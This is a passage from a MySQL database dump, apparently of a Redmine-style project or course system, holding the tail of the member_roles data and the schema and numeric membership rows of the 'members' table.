LL,1),(431,417,3,NULL,1),(432,418,3,NULL,1),(433,419,3,NULL,1),(434,420,3,NULL,1),(435,421,3,NULL,1),(436,422,3,NULL,1),(437,423,3,NULL,1),(438,424,3,NULL,1),(439,425,3,NULL,1),(440,426,3,NULL,1),(441,427,3,NULL,1),(442,428,3,NULL,1),(443,429,3,NULL,1),(444,430,3,NULL,1),(445,431,3,NULL,1),(446,432,3,NULL,1),(447,433,3,NULL,1),(448,434,3,NULL,1),(449,435,3,NULL,1),(450,436,3,NULL,1),(451,437,3,NULL,1),(452,438,3,NULL,1),(453,439,3,NULL,1),(454,440,3,NULL,1),(455,441,3,NULL,1),(456,442,3,NULL,1),(457,443,3,NULL,1),(458,444,3,NULL,1),(459,445,3,NULL,1),(460,446,3,NULL,1),(461,447,3,NULL,1),(462,448,3,NULL,1),(463,449,3,NULL,1),(464,450,3,NULL,1),(465,451,3,NULL,1),(466,452,3,NULL,1),(467,453,3,NULL,1),(468,454,3,NULL,1),(469,455,3,NULL,1),(470,456,3,NULL,1),(471,457,3,NULL,1),(472,458,3,NULL,1),(473,459,3,NULL,1),(474,460,3,NULL,1),(475,461,3,NULL,1),(476,462,3,NULL,1),(477,463,3,NULL,1),(480,466,3,NULL,1),(481,467,3,NULL,1),(482,468,3,NULL,1),(483,469,4,NULL,1),(484,470,4,NULL,1),(488,474,3,NULL,1),(489,475,4,NULL,1),(490,476,3,NULL,1),(502,488,3,NULL,1),(504,490,3,NULL,1),(505,491,3,NULL,1),(506,492,3,NULL,1),(508,494,3,NULL,1),(509,495,3,NULL,1),(510,496,3,NULL,1),(511,497,3,NULL,1),(512,498,3,NULL,1),(513,499,3,NULL,1),(515,501,3,NULL,1),(516,502,4,NULL,1),(518,504,4,NULL,1),(521,507,4,NULL,1),(522,508,3,NULL,1),(523,509,4,NULL,1),(554,540,3,NULL,1),(582,568,3,NULL,1),(583,569,3,NULL,1),(589,575,3,NULL,1),(618,605,3,NULL,1),(620,607,3,NULL,1),(621,608,3,NULL,1),(622,609,3,NULL,1),(623,610,3,NULL,1),(624,611,4,NULL,1),(625,612,3,NULL,1),(626,613,3,NULL,1),(627,614,4,NULL,1),(628,615,4,NULL,1),(633,620,4,NULL,1),(638,625,4,NULL,1),(641,628,3,NULL,1),(642,629,3,NULL,1),(644,631,3,NULL,1),(645,632,3,NULL,1),(646,633,3,NULL,1),(647,634,3,NULL,1),(650,637,3,NULL,1),(651,638,3,NULL,1),(653,640,3,NULL,1),(655,642,3,NULL,1),(660,647,3,NULL,1),(661,648,3,NULL,1),(662,649,3,NULL,1),(663,650,3,NULL,1),(665,652,3,NULL,1),(666,653,3,NULL,1),(668,655,4,NULL,1),(670,657,3,NULL,1),(671,658,3,NULL,1),(676,663,3,NULL,1),(677,664,3,NULL,1),(679,541,5,NULL,1),(680,543,5,NULL,1),(681,552,5,NULL,1),(682,572,5,NULL,1),(683,604,5,NULL,1),(684,626,5,NULL,1),(685,627,5,NULL,1),(686,630,5,NULL,1),(687,636,5,NULL,1),(688,639,5,NULL,1),(689,641,5,NULL,1),(690,643,5,NULL,1),(691,644,5,NULL,1),(692,645,5,NULL,1),(693,646,5,NULL,1),(694,656,5,NULL,1),(695,660,5,NULL,1),(696,661,5,NULL,1),(697,665,5,NULL,1),(699,667,5,NULL,1),(700,668,3,NULL,1),(701,669,3,NULL,1),(702,670,5,NULL,1),(703,671,5,NULL,1),(705,673,3,NULL,1),(706,674,5,NULL,1),(707,675,5,NULL,1),(708,676,5,NULL,1),(709,677,5,NULL,1),(710,678,5,NULL,1),(711,679,5,NULL,1),(712,680,5,NULL,1),(713,681,5,NULL,1),(714,682,5,NULL,1),(715,683,5,NULL,1),(716,684,5,NULL,1),(717,685,3,NULL,1),(718,686,3,NULL,1),(719,687,5,NULL,1),(720,688,5,NULL,1),(724,692,5,NULL,1),(725,693,5,NULL,1),(726,694,5,NULL,1),(727,695,5,NULL,1),(728,696,5,NULL,1),(754,722,3,NULL,1),(755,723,5,NULL,1),(756,724,3,NULL,1),(757,725,3,NULL,1),(758,726,5,NULL,1),(759,727,5,NULL,1),(760,728,3,NULL,1),(761,729,3,NULL,1),(762,730,5,NULL,1),(763,731,5,NULL,1),(765,733,5,NULL,1),(766,734,3,NULL,1),(767,735,5,NULL,1),(768,736,3,NULL,1),(769,737,5,NULL,1),(770,738,5,NULL,1),(771,739,5,NULL,1),(772,740,5,NULL,1),(773,741,5,NULL,1),(774,742,5,NULL,1),(775,743,5,NULL,1),(776,744,5,NULL,1),(777,745,5,NULL,1),(778,746,4,NULL,1),(779,747,4,NULL,1),(780,748,3,NULL,1),(781,749,3,NULL,1),(782,750,5,NULL,1),(783,751,3,NULL,1),(784,752,3,NULL,1),(786,754,3,NULL,1),(787,755,5,NULL,1),(788,756,3,NULL,1),(790,758,5,NULL,1),(791,759,3,NULL,1);
|
||
/*!40000 ALTER TABLE `member_roles` ENABLE KEYS */;
|
||
UNLOCK TABLES;
|
||
|
||
--
|
||
-- Table structure for table `members`
|
||
--
|
||
|
||
DROP TABLE IF EXISTS `members`;
|
||
/*!40101 SET @saved_cs_client = @@character_set_client */;
|
||
/*!40101 SET character_set_client = utf8 */;
|
||
CREATE TABLE `members` (
|
||
`id` int(11) NOT NULL AUTO_INCREMENT,
|
||
`user_id` int(11) NOT NULL DEFAULT '0',
|
||
`project_id` int(11) DEFAULT '0',
|
||
`created_on` datetime DEFAULT NULL,
|
||
`mail_notification` tinyint(1) NOT NULL DEFAULT '0',
|
||
`course_id` int(11) DEFAULT '-1',
|
||
`course_group_id` int(11) DEFAULT '0',
|
||
`is_collect` int(11) DEFAULT '1',
|
||
`graduation_group_id` int(11) DEFAULT '0',
|
||
`is_apply_signature` tinyint(1) DEFAULT '0',
|
||
PRIMARY KEY (`id`),
|
||
UNIQUE KEY `index_members_on_user_id_and_project_id` (`user_id`,`project_id`,`course_id`),
|
||
KEY `index_members_on_user_id` (`user_id`),
|
||
KEY `index_members_on_project_id` (`project_id`),
|
||
KEY `index_members_on_course_id` (`course_id`)
|
||
) ENGINE=InnoDB AUTO_INCREMENT=760 DEFAULT CHARSET=utf8;
|
||
/*!40101 SET character_set_client = @saved_cs_client */;
|
||
|
||
--
|
||
-- Dumping data for table `members`
|
||
--
|
||
|
||
LOCK TABLES `members` WRITE;
|
||
/*!40000 ALTER TABLE `members` DISABLE KEYS */;
|
||
INSERT INTO `members` VALUES (27,1,25,'2018-08-21 16:25:32',0,-1,0,1,0,0),(30,11,28,'2018-08-21 18:44:13',0,-1,0,1,0,0),(31,11,29,'2018-08-21 18:46:25',0,-1,0,1,0,0),(33,11,31,'2018-08-21 20:18:25',0,-1,0,1,0,0),(34,1,32,'2018-08-21 20:34:40',0,-1,0,1,0,0),(36,1,34,'2018-08-21 21:29:25',0,-1,0,1,0,0),(39,1,31,'2018-08-21 22:01:45',0,-1,0,1,0,0),(42,11,38,'2018-08-21 23:15:14',0,-1,0,1,0,0),(45,11,41,'2018-08-21 23:38:54',0,-1,0,1,0,0),(46,11,42,'2018-08-21 23:40:52',0,-1,0,1,0,0),(47,11,43,'2018-08-21 23:42:57',0,-1,0,1,0,0),(58,1,54,'2018-08-22 15:51:27',0,-1,0,1,0,0),(61,1,57,'2018-08-22 16:07:33',0,-1,0,1,0,0),(62,11,58,'2018-08-22 16:38:07',0,-1,0,1,0,0),(63,1,59,'2018-08-22 16:43:41',0,-1,0,1,0,0),(64,1,60,'2018-08-22 16:46:06',0,-1,0,1,0,0),(65,1,61,'2018-08-22 16:47:36',0,-1,0,1,0,0),(66,1,62,'2018-08-22 16:54:53',0,-1,0,1,0,0),(67,1,63,'2018-08-22 16:59:13',0,-1,0,1,0,0),(68,1,64,'2018-08-22 17:00:31',0,-1,0,1,0,0),(69,1,65,'2018-08-22 17:02:57',0,-1,0,1,0,0),(70,1,66,'2018-08-22 17:04:41',0,-1,0,1,0,0),(71,1,67,'2018-08-22 17:07:58',0,-1,0,1,0,0),(73,1,69,'2018-11-22 20:39:28',0,-1,0,1,0,0),(74,1,70,'2018-11-22 22:27:30',0,-1,0,1,0,0),(77,1,73,'2018-11-22 23:02:24',0,-1,0,1,0,0),(80,1,76,'2018-11-22 23:26:45',0,-1,0,1,0,0),(82,1,78,'2018-11-23 06:51:35',0,-1,0,1,0,0),(83,1,79,'2018-11-23 10:06:14',0,-1,0,1,0,0),(84,19,80,'2019-01-15 14:28:55',0,-1,0,1,0,0),(85,19,81,'2019-01-15 15:05:57',0,-1,0,1,0,0),(86,19,82,'2019-01-17 15:18:21',0,-1,0,1,0,0),(103,1,99,'2019-01-21 23:49:37',0,-1,0,1,0,0),(104,1,100,'2019-01-22 00:19:13',0,-1,0,1,0,0),(105,6,100,'2019-01-22 00:40:06',0,-1,0,1,0,0),(106,1,101,'2019-01-22 09:06:36',0,-1,0,1,0,0),(107,6,101,'2019-01-22 09:10:32',0,-1,0,1,0,0),(108,6,102,'2019-01-22 09:32:37',0,-1,0,1,0,0),(109,6,103,'2019-01-22 09:32:38',0,-1,0,1,0,0),(126,26,120,'2019-03-04 16:35:36',0,-1,0,1,0,0),(133,32,127,'2019-03-22 16:06:15',0,-1,0,1,0,0),(135,29,129,'2019-03-28 10:48:42',0,-1,0,1,0,0),(136,26,130,'2019-04-01 11:23:26',0,-1,0,1,0,0),(137,42,130,'2019-04-17 09:55:47',0,-1,0,1,0,0),(138,43,130,'2019-04-17 09:57:04',0,-1,0,1,0,0),(139,6,131,'2019-04-28 10:06:35',0,-1,0,1,0,0),(140,51,132,'2019-08-07 15:10:24',0,-1,0,1,0,0),(145,46,130,'2019-08-13 17:13:59',0,-1,0,1,0,0),(146,49,130,'2019-08-13 17:19:25',0,-1,0,1,0,0),(150,50,137,'2019-08-16 08:09:17',0,-1,0,1,0,0),(152,50,139,'2019-08-16 08:14:51',0,-1,0,1,0,0),(153,50,140,'2019-08-16 08:19:15',0,-1,0,1,0,0),(154,50,141,'2019-08-16 08:23:46',0,-1,0,1,0,0),(156,50,143,'2019-08-16 08:31:31',0,-1,0,1,0,0),(157,54,144,'2019-08-16 09:31:37',0,-1,0,1,0,0),(166,50,156,'2019-09-29 09:10:33',0,-1,0,1,0,0),(167,50,157,'2019-09-30 11:15:20',0,-1,0,1,0,0),(168,50,158,'2019-09-30 11:36:22',0,-1,0,1,0,0),(169,50,159,'2019-09-30 12:14:18',0,-1,0,1,0,0),(175,20,159,'2019-10-08 11:17:57',0,-1,0,1,0,0),(184,46,169,'2019-10-23 15:20:39',0,-1,0,1,0,0),(185,49,169,'2019-10-23 16:37:05',0,-1,0,1,0,0),(188,41,127,'2019-10-28 15:11:19',0,-1,0,1,0,0),(195,50,178,'2019-10-29 15:24:35',0,-1,0,1,0,0),(203,46,178,'2019-10-29 16:29:29',0,-1,0,1,0,0),(231,49,199,'2019-11-07 15:51:07',0,-1,0,1,0,0),(233,46,199,'2019-11-07 15:53:57',0,-1,0,1,0,0),(235,64,199,'2019-11-07 16:20:28',0,-1,0,1,0,0),(236,65,199,'2019-11-08 10:52:01',0,-1,0,1,0,0),(241,49,203,'2019-11-11 09:01:30',0,-1,0,1,0,0),(242,46,203,'2019-11-11 09:02:38',0,-1,0,1,0,0),(243,48,203,'2019-11-11 09:11:06',0,-1,0,1,0,0),(244,66,203,'2019-11-11 09:12:57',0,-1,0,1,0,0),(245,49,204,'2019-11-11 09:19:45',0,-1,0,1,0,0),(246,49,205,'2019-11-11 09:21:19',0,-1,0,1,0,0),(264,50,219,'2019-11-11 10:47:56',0,-1,0,1,0,0),(266,50,221,'2019-11-11 10:51:16',0,-1,0,1,0,0),(270,50,223,'2019-11-11 11:04:26',0,-1,0,1,0,0),(271,48,199,'2019-11-11 11:08:00',0,-1,0,1,0,0),(272,64,224,'2019-11-11 11:38:58',0,-1,0,1,0,0),(273,49,225,'2019-11-11 11:44:39',0,-1,0,1,0,0),(274,50,226,'2019-11-11 12:34:37',0,-1,0,1,0,0),(279,49,230,'2019-11-11 15:37:23',0,-1,0,1,0,0),(280,64,231,'2019-11-11 15:37:29',0,-1,0,1,0,0),(281,49,232,'2019-11-11 17:07:52',0,-1,0,1,0,0),(282,64,232,'2019-11-11 17:08:54',0,-1,0,1,0,0),(302,65,248,'2019-11-22 15:41:18',0,-1,0,1,0,0),(304,50,250,'2019-12-04 08:21:58',0,-1,0,1,0,0),(305,75,251,'2020-02-01 19:03:09',0,-1,0,1,0,0),(306,76,251,'2020-02-01 20:36:53',0,-1,0,1,0,0),(307,75,252,'2020-02-01 21:17:31',0,-1,0,1,0,0),(308,76,252,'2020-02-01 21:18:26',0,-1,0,1,0,0),(309,75,253,'2020-02-01 22:24:23',0,-1,0,1,0,0),(310,77,254,'2020-02-02 23:36:38',0,-1,0,1,0,0),(311,77,255,'2020-02-03 12:08:29',0,-1,0,1,0,0),(312,55,256,'2020-02-03 16:57:11',0,-1,0,1,0,0),(313,78,257,'2020-02-03 17:36:28',0,-1,0,1,0,0),(314,78,256,'2020-02-03 17:44:53',0,-1,0,1,0,0),(315,48,258,'2020-02-03 17:45:42',0,-1,0,1,0,0),(318,79,251,'2020-02-04 22:06:21',0,-1,0,1,0,0),(319,80,251,'2020-02-04 22:15:09',0,-1,0,1,0,0),(320,76,255,'2020-02-05 11:17:13',0,-1,0,1,0,0),(321,82,255,'2020-02-10 10:14:29',0,-1,0,1,0,0),(322,86,255,'2020-02-10 10:14:42',0,-1,0,1,0,0),(323,85,255,'2020-02-10 10:14:57',0,-1,0,1,0,0),(324,87,255,'2020-02-10 10:15:07',0,-1,0,1,0,0),(325,81,255,'2020-02-10 10:15:35',0,-1,0,1,0,0),(326,88,255,'2020-02-10 10:16:14',0,-1,0,1,0,0),(327,90,255,'2020-02-10 10:16:23',0,-1,0,1,0,0),(328,91,255,'2020-02-10 10:16:40',0,-1,0,1,0,0),(329,95,255,'2020-02-10 10:16:47',0,-1,0,1,0,0),(330,96,255,'2020-02-10 10:16:56',0,-1,0,1,0,0),(331,97,255,'2020-02-10 10:17:38',0,-1,0,1,0,0),(332,98,255,'2020-02-10 10:17:47',0,-1,0,1,0,0),(333,99,255,'2020-02-10 10:17:55',0,-1,0,1,0,0),(334,75,255,'2020-02-10 10:18:04',0,-1,0,1,0,0),(335,84,255,'2020-02-10 10:20:11',0,-1,0,1,0,0),(336,89,255,'2020-02-10 10:20:19',0,-1,0,1,0,0),(337,93,255,'2020-02-10 10:20:29',0,-1,0,1,0,0),(338,80,255,'2020-02-10 10:20:38',0,-1,0,1,0,0),(339,94,255,'2020-02-10 10:20:47',0,-1,0,1,0,0),(340,100,255,'2020-02-10 10:20:56',0,-1,0,1,0,0),(341,102,255,'2020-02-10 10:21:03',0,-1,0,1,0,0),(342,92,255,'2020-02-10 10:22:04',0,-1,0,1,0,0),(343,83,255,'2020-02-10 10:26:53',0,-1,0,1,0,0),(344,103,261,'2020-02-10 12:26:21',0,-1,0,1,0,0),(345,103,262,'2020-02-10 15:22:57',0,-1,0,1,0,0),(346,103,263,'2020-02-10 15:24:55',0,-1,0,1,0,0),(347,103,264,'2020-02-10 15:37:24',0,-1,0,1,0,0),(348,103,265,'2020-02-11 09:18:05',0,-1,0,1,0,0),(349,103,266,'2020-02-11 09:30:09',0,-1,0,1,0,0),(350,55,267,'2020-02-11 09:39:11',0,-1,0,1,0,0),(351,47,268,'2020-02-11 09:40:38',0,-1,0,1,0,0),(352,47,269,'2020-02-11 09:46:46',0,-1,0,1,0,0),(353,47,270,'2020-02-11 10:06:32',0,-1,0,1,0,0),(354,47,271,'2020-02-11 11:10:56',0,-1,0,1,0,0),(355,101,255,'2020-02-11 16:43:58',0,-1,0,1,0,0),(356,80,272,'2020-03-09 10:22:41',0,-1,0,1,0,0),(357,51,273,'2020-03-14 09:33:12',0,-1,0,1,0,0),(358,104,255,'2020-03-19 14:01:17',0,-1,0,1,0,0),(359,107,255,'2020-03-19 15:13:11',0,-1,0,1,0,0),(360,106,255,'2020-03-19 15:15:15',0,-1,0,1,0,0),(361,109,255,'2020-03-19 15:15:17',0,-1,0,1,0,0),(362,108,255,'2020-03-19 15:17:18',0,-1,0,1,0,0),(363,105,255,'2020-03-19 15:23:57',0,-1,0,1,0,0),(364,63,266,'2020-03-19 15:51:49',0,-1,0,1,0,0),(365,45,274,'2020-03-27 19:19:54',0,-1,0,1,0,0),(394,46,232,'2020-08-12 08:31:20',0,-1,0,1,0,0),(398,51,306,'2020-08-12 08:53:51',0,-1,0,1,0,0),(399,34,307,'2020-08-12 08:53:51',0,-1,0,1,0,0),(400,49,308,'2020-08-12 08:53:51',0,-1,0,1,0,0),(401,61,309,'2020-08-12 08:53:51',0,-1,0,1,0,0),(402,46,310,'2020-08-12 08:57:45',0,-1,0,1,0,0),(403,56,311,'2020-08-12 08:57:45',0,-1,0,1,0,0),(404,37,312,'2020-08-12 08:57:45',0,-1,0,1,0,0),(405,66,313,'2020-08-12 08:57:45',0,-1,0,1,0,0),(406,10,314,'2020-08-12 08:57:45',0,-1,0,1,0,0),(407,46,315,'2020-08-12 08:57:45',0,-1,0,1,0,0),(408,38,316,'2020-08-12 08:57:45',0,-1,0,1,0,0),(409,90,317,'2020-08-12 08:57:45',0,-1,0,1,0,0),(410,46,318,'2020-08-12 08:57:45',0,-1,0,1,0,0),(411,84,319,'2020-08-12 08:57:45',0,-1,0,1,0,0),(412,50,320,'2020-08-12 08:57:45',0,-1,0,1,0,0),(413,108,321,'2020-08-12 08:57:45',0,-1,0,1,0,0),(414,24,322,'2020-08-12 08:57:45',0,-1,0,1,0,0),(415,34,323,'2020-08-12 08:57:46',0,-1,0,1,0,0),(416,30,324,'2020-08-12 08:57:46',0,-1,0,1,0,0),(417,37,325,'2020-08-12 08:57:46',0,-1,0,1,0,0),(418,15,326,'2020-08-12 08:57:46',0,-1,0,1,0,0),(419,45,327,'2020-08-12 08:57:50',0,-1,0,1,0,0),(420,3,328,'2020-08-12 08:58:22',0,-1,0,1,0,0),(421,99,329,'2020-08-12 08:58:22',0,-1,0,1,0,0),(422,67,330,'2020-08-12 08:58:22',0,-1,0,1,0,0),(423,56,331,'2020-08-12 08:58:45',0,-1,0,1,0,0),(424,55,332,'2020-08-12 08:58:45',0,-1,0,1,0,0),(425,6,333,'2020-08-12 08:58:45',0,-1,0,1,0,0),(426,7,334,'2020-08-12 08:58:45',0,-1,0,1,0,0),(427,41,335,'2020-08-12 08:58:45',0,-1,0,1,0,0),(428,76,336,'2020-08-12 08:58:45',0,-1,0,1,0,0),(429,51,337,'2020-08-12 08:58:45',0,-1,0,1,0,0),(430,16,338,'2020-08-12 08:58:45',0,-1,0,1,0,0),(431,104,339,'2020-08-12 08:58:55',0,-1,0,1,0,0),(432,104,340,'2020-08-12 08:58:55',0,-1,0,1,0,0),(433,15,341,'2020-08-12 08:58:55',0,-1,0,1,0,0),(434,29,342,'2020-08-12 08:58:56',0,-1,0,1,0,0),(435,97,343,'2020-08-12 08:59:23',0,-1,0,1,0,0),(436,21,344,'2020-08-12 08:59:23',0,-1,0,1,0,0),(437,76,345,'2020-08-12 08:59:23',0,-1,0,1,0,0),(438,39,346,'2020-08-12 08:59:23',0,-1,0,1,0,0),(439,86,347,'2020-08-12 08:59:23',0,-1,0,1,0,0),(440,40,348,'2020-08-12 08:59:23',0,-1,0,1,0,0),(441,36,349,'2020-08-12 08:59:24',0,-1,0,1,0,0),(442,97,350,'2020-08-12 08:59:57',0,-1,0,1,0,0),(443,39,351,'2020-08-12 09:00:15',0,-1,0,1,0,0),(444,95,352,'2020-08-12 09:00:15',0,-1,0,1,0,0),(445,19,353,'2020-08-12 09:00:19',0,-1,0,1,0,0),(446,94,354,'2020-08-12 09:00:39',0,-1,0,1,0,0),(447,53,355,'2020-08-12 09:00:39',0,-1,0,1,0,0),(448,16,356,'2020-08-12 09:00:48',0,-1,0,1,0,0),(449,109,357,'2020-08-12 09:00:53',0,-1,0,1,0,0),(450,5,358,'2020-08-12 09:01:14',0,-1,0,1,0,0),(451,30,359,'2020-08-12 09:01:14',0,-1,0,1,0,0),(452,35,360,'2020-08-12 09:01:30',0,-1,0,1,0,0),(453,56,361,'2020-08-12 09:01:30',0,-1,0,1,0,0),(454,41,362,'2020-08-12 09:01:30',0,-1,0,1,0,0),(455,4,363,'2020-08-12 09:01:30',0,-1,0,1,0,0),(456,25,364,'2020-08-12 09:01:40',0,-1,0,1,0,0),(457,104,365,'2020-08-12 09:01:50',0,-1,0,1,0,0),(458,4,366,'2020-08-12 09:02:53',0,-1,0,1,0,0),(459,54,367,'2020-08-12 09:03:06',0,-1,0,1,0,0),(460,15,368,'2020-08-12 09:03:26',0,-1,0,1,0,0),(461,104,369,'2020-08-12 09:04:00',0,-1,0,1,0,0),(462,46,370,'2020-08-12 09:04:09',0,-1,0,1,0,0),(463,26,371,'2020-08-12 09:07:46',0,-1,0,1,0,0),(466,1,374,'2020-08-12 10:09:09',0,-1,0,1,0,0),(467,49,375,'2020-08-13 01:33:16',0,-1,0,1,0,0),(468,1,376,'2020-08-13 01:57:09',0,-1,0,1,0,0),(469,46,376,'2020-08-13 01:58:26',0,-1,0,1,0,0),(470,47,376,'2020-08-13 01:58:35',0,-1,0,1,0,0),(474,115,378,'2020-08-19 01:11:40',0,-1,0,1,0,0),(475,49,376,'2020-08-20 01:47:17',0,-1,0,1,0,0),(476,49,379,'2020-08-20 01:49:28',0,-1,0,1,0,0),(488,48,389,'2020-08-27 02:56:48',0,-1,0,1,0,0),(490,47,391,'2020-08-27 03:21:38',0,-1,0,1,0,0),(491,47,392,'2020-08-27 03:25:19',0,-1,0,1,0,0),(492,48,393,'2020-08-27 03:25:52',0,-1,0,1,0,0),(494,55,393,'2020-08-27 03:35:16',0,-1,0,1,0,0),(495,46,393,'2020-09-07 07:16:26',0,-1,0,1,0,0),(496,115,395,'2020-09-08 05:35:44',0,-1,0,1,0,0),(497,1,396,'2020-09-11 06:57:04',0,-1,0,1,0,0),(498,49,397,'2020-10-15 00:53:52',0,-1,0,1,0,0),(499,49,398,'2020-10-15 01:06:01',0,-1,0,1,0,0),(501,50,400,'2020-10-15 01:18:08',0,-1,0,1,0,0),(502,46,400,'2020-10-15 01:57:50',0,-1,0,1,0,0),(504,46,397,'2020-10-16 01:35:18',0,-1,0,1,0,0),(507,63,370,'2020-10-16 06:51:31',0,-1,0,1,0,0),(508,46,404,'2020-10-16 06:51:52',0,-1,0,1,0,0),(509,66,370,'2020-10-19 08:21:11',0,-1,0,1,0,0),(540,134,430,'2021-01-04 02:34:21',0,-1,0,1,0,0),(541,133,430,'2021-01-04 07:41:48',0,-1,0,1,0,1),(543,128,430,'2021-01-04 08:27:12',0,-1,0,1,0,1),(552,1,430,'2021-01-05 09:04:23',0,-1,0,1,0,1),(568,115,447,'2021-01-07 01:07:03',0,-1,0,1,0,0),(569,115,448,'2021-01-07 01:09:22',0,-1,0,1,0,0),(572,46,448,'2021-01-07 01:45:20',0,-1,0,1,0,1),(575,115,453,'2021-01-07 02:49:58',0,-1,0,1,0,0),(604,1,448,'2021-01-19 02:30:25',0,-1,0,1,0,1),(605,129,470,'2021-01-19 02:51:59',0,-1,0,1,0,0),(607,155,472,'2021-01-22 07:38:53',0,-1,0,1,0,0),(608,155,473,'2021-01-22 08:01:06',0,-1,0,1,0,0),(609,155,474,'2021-01-22 08:02:31',0,-1,0,1,0,0),(610,155,475,'2021-01-22 08:41:07',0,-1,0,1,0,0),(611,152,474,'2021-01-22 08:58:06',0,-1,0,1,0,0),(612,155,476,'2021-01-25 06:57:37',0,-1,0,1,0,0),(613,156,477,'2021-01-26 01:28:44',0,-1,0,1,0,0),(614,122,477,'2021-01-26 02:01:00',0,-1,0,1,0,0),(615,121,477,'2021-01-26 02:55:15',0,-1,0,1,0,0),(620,49,477,'2021-01-27 01:33:46',0,-1,0,1,0,0),(625,120,477,'2021-01-28 07:51:56',0,-1,0,1,0,0),(626,157,477,'2021-01-28 08:09:45',0,-1,0,1,0,1),(627,158,477,'2021-01-28 08:09:47',0,-1,0,1,0,1),(628,158,478,'2021-01-28 08:10:18',0,-1,0,1,0,0),(629,157,479,'2021-01-28 08:13:15',0,-1,0,1,0,0),(630,137,477,'2021-01-28 08:18:15',0,-1,0,1,0,1),(631,137,480,'2021-01-28 08:18:32',0,-1,0,1,0,0),(632,122,481,'2021-01-28 08:27:27',0,-1,0,1,0,0),(633,120,482,'2021-01-28 08:29:08',0,-1,0,1,0,0),(634,46,483,'2021-01-28 08:59:06',0,-1,0,1,0,0),(636,159,477,'2021-01-28 10:29:55',0,-1,0,1,0,1),(637,159,485,'2021-01-28 10:30:27',0,-1,0,1,0,0),(638,121,486,'2021-01-28 14:08:58',0,-1,0,1,0,0),(639,152,477,'2021-01-28 14:11:07',0,-1,0,1,0,1),(640,152,487,'2021-01-28 14:11:30',0,-1,0,1,0,0),(641,160,477,'2021-01-28 15:33:30',0,-1,0,1,0,1),(642,160,488,'2021-01-28 15:41:47',0,-1,0,1,0,0),(643,162,477,'2021-02-20 01:34:16',0,-1,0,1,0,1),(644,164,477,'2021-02-20 02:00:13',0,-1,0,1,0,1),(645,167,477,'2021-02-20 02:00:44',0,-1,0,1,0,1),(646,171,477,'2021-02-20 03:30:20',0,-1,0,1,0,1),(647,164,489,'2021-02-20 03:43:08',0,-1,0,1,0,0),(648,155,490,'2021-02-20 04:47:43',0,-1,0,1,0,0),(649,49,491,'2021-02-22 07:38:25',0,-1,0,1,0,0),(650,49,492,'2021-02-22 07:39:24',0,-1,0,1,0,0),(652,49,494,'2021-02-22 08:29:36',0,-1,0,1,0,0),(653,73,495,'2021-02-22 09:06:57',0,-1,0,1,0,0),(655,181,477,'2021-02-25 00:57:01',0,-1,0,1,0,0),(656,182,477,'2021-02-25 01:09:06',0,-1,0,1,0,1),(657,182,496,'2021-02-25 01:18:01',0,-1,0,1,0,0),(658,181,497,'2021-02-25 02:10:56',0,-1,0,1,0,0),(660,128,477,'2021-02-25 06:29:50',0,-1,0,1,0,1),(661,128,496,'2021-02-25 08:57:10',0,-1,0,1,0,1),(663,128,500,'2021-02-25 09:23:46',0,-1,0,1,0,0),(664,181,501,'2021-02-26 00:33:20',0,-1,0,1,0,0),(665,184,501,'2021-02-26 02:34:16',0,-1,0,1,0,1),(667,179,477,'2021-03-01 03:41:30',0,-1,0,1,0,1),(668,179,503,'2021-03-01 07:22:50',0,-1,0,1,0,0),(669,1,504,'2021-03-01 08:21:53',0,-1,0,1,0,0),(670,128,503,'2021-03-03 01:15:49',0,-1,0,1,0,1),(671,173,477,'2021-03-04 04:55:48',0,-1,0,1,0,1),(673,48,505,'2021-03-04 07:21:41',0,-1,0,1,0,0),(674,133,505,'2021-03-04 07:24:20',0,-1,0,1,0,1),(675,191,477,'2021-03-04 07:51:42',0,-1,0,1,0,1),(676,175,477,'2021-03-04 07:56:59',0,-1,0,1,0,1),(677,163,477,'2021-03-04 07:56:59',0,-1,0,1,0,1),(678,177,477,'2021-03-04 07:56:59',0,-1,0,1,0,1),(679,165,477,'2021-03-04 07:56:59',0,-1,0,1,0,1),(680,172,477,'2021-03-04 07:57:00',0,-1,0,1,0,1),(681,180,477,'2021-03-04 07:57:00',0,-1,0,1,0,1),(682,166,477,'2021-03-04 07:57:00',0,-1,0,1,0,1),(683,174,477,'2021-03-04 07:57:00',0,-1,0,1,0,1),(684,169,477,'2021-03-04 07:57:00',0,-1,0,1,0,1),(685,173,506,'2021-03-05 01:00:05',0,-1,0,1,0,0),(686,165,507,'2021-03-05 01:07:19',0,-1,0,1,0,0),(687,128,506,'2021-03-05 01:12:31',0,-1,0,1,0,1),(688,192,477,'2021-03-05 02:03:17',0,-1,0,1,0,1),(692,1,477,'2021-03-05 07:21:28',0,-1,0,1,0,1),(693,73,477,'2021-03-05 07:21:28',0,-1,0,1,0,1),(694,46,477,'2021-03-05 07:21:28',0,-1,0,1,0,1),(695,186,477,'2021-03-05 07:21:28',0,-1,0,1,0,1),(696,194,477,'2021-03-05 07:21:28',0,-1,0,1,0,1),(722,186,512,'2021-03-06 02:41:43',0,-1,0,1,0,0),(723,206,477,'2021-03-06 02:54:00',0,-1,0,1,0,1),(724,206,513,'2021-03-06 05:34:14',0,-1,0,1,0,0),(725,171,514,'2021-03-06 10:12:34',0,-1,0,1,0,0),(726,207,477,'2021-03-06 10:43:35',0,-1,0,1,0,1),(727,189,477,'2021-03-06 10:43:41',0,-1,0,1,0,1),(728,189,515,'2021-03-06 12:24:24',0,-1,0,1,0,0),(729,162,516,'2021-03-07 09:47:22',0,-1,0,1,0,0),(730,211,477,'2021-03-08 00:24:59',0,-1,0,1,0,1),(731,208,477,'2021-03-08 12:09:18',0,-1,0,1,0,1),(733,190,477,'2021-03-09 08:26:53',0,-1,0,1,0,1),(734,190,517,'2021-03-09 08:27:31',0,-1,0,1,0,0),(735,214,477,'2021-03-09 09:34:12',0,-1,0,1,0,1),(736,174,518,'2021-03-10 01:24:54',0,-1,0,1,0,0),(737,209,477,'2021-03-10 06:06:12',0,-1,0,1,0,1),(738,187,477,'2021-03-10 06:06:12',0,-1,0,1,0,1),(739,200,477,'2021-03-10 06:06:12',0,-1,0,1,0,1),(740,193,477,'2021-03-10 06:06:12',0,-1,0,1,0,1),(741,197,477,'2021-03-10 06:06:12',0,-1,0,1,0,1),(742,215,477,'2021-03-10 06:06:13',0,-1,0,1,0,1),(743,198,477,'2021-03-10 06:06:13',0,-1,0,1,0,1),(744,213,477,'2021-03-10 06:06:13',0,-1,0,1,0,1),(745,210,477,'2021-03-10 06:06:13',0,-1,0,1,0,1),(746,73,491,'2021-03-10 07:34:40',0,-1,0,1,0,0),(747,73,376,'2021-03-10 07:36:17',0,-1,0,1,0,0),(748,1,519,'2021-03-10 